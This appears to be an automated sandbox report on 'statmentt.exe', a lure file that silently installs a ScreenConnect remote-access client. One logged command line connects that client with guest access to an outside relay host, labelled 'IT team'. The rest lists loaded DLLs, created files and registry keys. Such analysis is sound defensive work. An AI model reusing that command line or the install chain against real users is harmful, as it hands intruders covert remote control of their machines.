Source: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr; String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr; String found in binary or memory: http://wixtoolset.org/releases/
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.2.dr; String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Key opened (5 events): HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Key opened (5 events): HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Source: statmentt.exe | PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_058301F0 CreateProcessAsUserW
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\68f199.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{2750A569-82DB-B303-FEC6-22A2E87A0AD0}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIF458.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIF488.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIF739.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\68f19b.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{2750A569-82DB-B303-FEC6-22A2E87A0AD0}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{2750A569-82DB-B303-FEC6-22A2E87A0AD0}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Windows\Installer\wix{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\d20awlgx.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\d20awlgx.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSIF488.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B286FE8
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B595BC1
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B596283
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B596C90
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B2870BA
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B2810CF
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B2810D7
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B590790
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B593024
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B59E6C6
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B595F16
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B597185
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B59F472
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B593058
Source: statmentt.exe | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: statmentt.exe | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: statmentt.exe, 00000000.00000002.1799693948.00000000057C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1799967396.0000000005880000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1785114133.00000000031E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs statmentt.exe
Source: statmentt.exe, 00000000.00000000.1770182468.00000000010FF000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statmentt.exe
Source: statmentt.exe, 00000000.00000000.1770182468.00000000010FF000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1800368521.0000000005910000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamelibwebp.dllB vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1800368521.0000000005910000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamezlib.dll2 vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1800368521.0000000005910000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1805924835.0000000008038000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewixca.dll\ vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1805802815.0000000007060000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsiexec.exe.muiX vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1798027712.0000000004413000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1802003851.0000000005CCC000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1802003851.0000000005CCC000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSfxCA.dllL vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1802003851.0000000005CCC000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamewixca.dll\ vs statmentt.exe
Source: statmentt.exe, 00000000.00000002.1802003851.0000000005CCC000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statmentt.exe
Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statmentt.exe
Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibwebp.dllB vs statmentt.exe
Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezlib.dll2 vs statmentt.exe
Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statmentt.exe
Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenamelibwebp.dllB vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenamezlib.dll2 vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenameSfxCA.dllL vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenamewixca.dll\ vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statmentt.exe
Source: statmentt.exe | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs statmentt.exe
Source: statmentt.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.statmentt.exe.5880000.2.raw.unpack, CursorBuffer.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.statmentt.exe.bd63d8.2.raw.unpack, CursorBuffer.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal48.evad.winEXE@17/56@1/1
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)
Source: C:\Users\user\Desktop\statmentt.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\statmentt.exe.log
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\Desktop\statmentt.exe | File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
Source: statmentt.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: statmentt.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\statmentt.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\statmentt.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6876625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: statmentt.exe | ReversingLabs: Detection: 21%
Source: statmentt.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: statmentt.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
Source: C:\Users\user\Desktop\statmentt.exe | File read: C:\Users\user\Desktop\statmentt.exe
Source: unknown | Process created: C:\Users\user\Desktop\statmentt.exe "C:\Users\user\Desktop\statmentt.exe"
Source: C:\Users\user\Desktop\statmentt.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8DDF4D7DFA864A88ED87F00705A0EDAF C
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6D5F870693EF3B6FD3A6AF241B788648
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B9FCDEB162140880EF803EB7EC0353E8 E Global\MSI0000
Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "15e3aa5a-03ad-43c1-8c56-797fd84cc894" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "5082607d-6583-424c-b175-f03711434b52" "System"
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\statmentt.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
